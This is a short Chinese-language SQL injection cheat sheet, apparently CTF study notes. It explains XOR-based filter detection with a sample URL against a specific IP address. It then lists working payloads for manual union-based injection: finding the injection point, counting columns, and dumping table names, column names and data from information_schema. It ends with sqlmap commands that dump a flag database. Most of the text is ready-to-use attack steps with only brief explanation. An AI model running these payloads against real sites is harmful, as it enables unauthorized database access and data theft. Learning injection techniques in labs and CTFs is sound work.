SQL注入

异或注入(可用于判断过滤)

异或是一种逻辑运算，运算法则简言之就是：两个条件相同（同真或同假）即为假（0），两个条件不同即为真（1），null与任何条件做异或运算都为null，如果从数学的角度理解就是，空集与任何集合的交集都为空。mysql里异或运算符为^ 或者 xor。

两个同为真（假）的条件做异或，结果为假
一个条件为真，一个条件为假，结果为真

^运算符会做位异或运算 如:

1^3=2

1是00000001,
3是00000011,
得到00000010 = 2

xor做逻辑运算 1 xor 0 会输出1 其他情况输出其他所有数据 用法:

可用于判断过滤
http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+
如果返回页面显示正常，那就证明length(‘union’)==0的，也就是union被过滤了

sql手动注入

第一步：判断环境，寻找注入点
  确定注入点：用’报错就有注入的希望 and 1=1 正常 and 1=2 报错就基本能注入
第二步：猜解字段
  ' order by 3 # 
第三步：联合查询
  0' union select 1,2,3,4#
第四步：爆表
​    0' union select 1,database(),user(),version()#

   [查表名] id=0' union select 1,(select group_concat(table_name) from information_schema.tables wheretable_schema=database()),user(),version()#           

   [查列名]id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database()and table_name='表名‘),user(),version()#           

   [查数据]id=0' union select 1，(select 列名 from 表名),user(),version()#         

sqlmap

1. python /usr/share/sqlmap/sqlmap.py -r 1.txt -p id --current-db
2. python /usr/share/sqlmap/sqlmap.py -r 1.txt -p id -D skctf_flag
3. python /usr/share/sqlmap/sqlmap.py -r 1.txt -p id -D skctf_flag --tables
4. python /usr/share/sqlmap/sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g --columns
5. python /usr/share/sqlmap/sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g -C            "skctf_flag" --dump